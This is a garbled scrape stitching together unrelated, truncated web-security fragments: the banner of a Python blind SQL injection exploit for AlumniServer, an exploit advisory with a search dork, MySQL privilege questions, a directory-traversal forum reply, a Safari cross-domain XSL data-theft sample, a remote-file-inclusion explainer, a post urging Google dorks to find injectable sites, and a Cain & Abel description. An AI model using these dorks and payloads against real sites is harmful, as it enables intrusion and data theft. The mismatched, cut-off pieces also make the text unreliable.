#
#Used modules
import urllib2,sys,re,os
#Defined functions
def init():
    if(sys.platform=='win32'):
        os.system("cls")
        os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
        os.system ("color 02")
    else:
        os.system("clear")
    print "\t###########################
    print "\t###########################
    print "\t## AlumniServer v-1.0.1 Blind SQLi Exploit ##\n\n"
...
CMS INFORMATION:
-->WEB: http://www.alumniserver.net/
-->DOWNLOAD: http://www.alumniserver.net/
-->DEMO: N/A
-->CATEGORY: CMS/Education
-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools and companies. Services for users include profile page,...
-->RELEASED: 2009-06-11

CMS VULNERABILITY:
-->TESTED ON: firefox 3
-->DORK: "AlumniServer project"
-->CATEGORY: AUTH-BYPASS (SQLi)
-->AFFECT VERSION: CURRENT
-->Discovered Bug date: 2009-06-16
-->Reported Bug date: 2009-06-16
-->Fixed bug date: N/A
-->Info patch (????): N/A
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend ...
e. Now I have to create more users with several of the same permissions. Is there a command in MySQL that lets me create a new user by copying a user's privileges from a template?

How to Set User Privileges

How should I set privileges so that users can create and modify their own databases? I am running MySQL 3.23.53 with phpMyAdmin 2.5.4. I have several DBs and users. I can set up new users and databases without problems. The user can only see the new data, as it should be. I want to allow users to be able to create their own databases. Now in phpMyAdmin, when they create a new database, they cannot create tables in it, and they cannot see the database they just created in their database list, although I can see the database they created with the admin user. When the user first creates a database and tries to ...
Well, this attack will never work because Wapiti is trying to include the file boot.ini which is (as far as I know but I'm not a Windows expert) always on drive c: The error message shows that the INETPUB Directory is on drive E: so a simple directory traversal attack won't work (at least for this file).

--cut--
This runtime error, 800A000D occurs when you execute a VBScript. My suggestion is that there is a VBScript statement that does not understand a keyword you are using in your script. Alternatively, you may not be running the script as an ordinary user and not as an Administrator.
--cut--
Source: http://www.computerperformance.co.uk/Logon/code/code_800A000D.htm

If you have access to the system you are testing, search for a file on drive e: (maybe a txt or asp file which is part of the application) and modify the Wapiti URL. Or (better) look at the source code of toplinks-archive-courses-spas.asp ...
ECHO.OR.ID
ECHO_ADV_110$2009
------------------------------
[ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial Of S ...
Safari prior to version 4 may permit an evil web page to steal arbitrary XML data cross-domain. This is accomplished by abusing a relatively obscure cross-domain access point which was completely missing a cross-domain access check. The access point in question is the document() function in XSL. This is best illustrated with a sample evil XSL file which abuses this function:

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/ xmlns:str="http://exslt.org/
<xsl:template match="*">
<html>
<body>
Below, you should see e-mail stolen cross-domain!
<p/>
<xsl:value-of select="document('https://
Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or "inject") code into a computer program to change the course of execution. The results of a code injection attack can be disastrous. For instance, code injection is used by some computer worms to propagate. Overview and example ...
How the attack works

Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own (malicious) code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this:

include($page . '.php');

This line of PHP code is then used in URLs like the following example:

http://www.vulnerable.example.org/index.php?page=archive

Because the h ...
I don't know why it could happen, but I remember what one founder of Google said, like this: "Google is the program which can learn from everyone who tries to input or search everything with a word or sentence, and it will be saved in its database."

Because of that issue, Google will search all people wanted without expected. Just copy and paste the following:

inurl:(0x3a,username,0x3a,username)
inurl:table_schema
inurl:table_name

or other SQL injection commands input with "inurl"; then the result is that every site which has a bug for SQL injection will be posted to the Google results.

Nice, isn't it......

Regards,
Siegh_wahrheit
Cain & Abel is a password recovery tool for Microsoft operating
systems. It allows easy recovery of various kinds of passwords by
sniffing the network, cracking encrypted passwords using dictionary,
brute-force and cryptanalysis attacks, recording VoIP conversations,
decoding scrambled passwords, recovering wireless network keys,
revealing password boxes, uncovering cached passwords and analyzing
routing protocols. The program does not exploit any software
vulnerabilities or bugs that could not be fixed with little effort.
It covers some security aspects and weaknesses present in protocol
standards, authentication methods and caching mechanisms; its main
goal is the simplified recovery of passwords and credentials from a
variety of sources, but it also ships some "non standard" utilities
for Microsoft Windows users.
Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants / professio ...